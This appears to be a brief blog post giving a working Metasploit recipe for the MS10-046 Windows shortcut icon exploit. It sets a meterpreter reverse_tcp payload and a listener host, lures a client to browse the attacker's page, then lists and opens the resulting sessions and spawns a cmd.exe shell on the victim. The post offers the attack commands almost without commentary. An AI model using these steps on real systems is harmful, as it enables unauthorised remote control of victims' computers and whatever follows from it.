control – metasploit ms10_046_shortcut_icon_dllloader

use windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.0.1
set lhost 192.168.0.1
exploit

Client uses web browser to look at page 192.168.0.1

sessions -l (shows session id)

sessions -i (session number) connects to them.

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1

Advertisements

2 thoughts on “control – metasploit ms10_046_shortcut_icon_dllloader

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s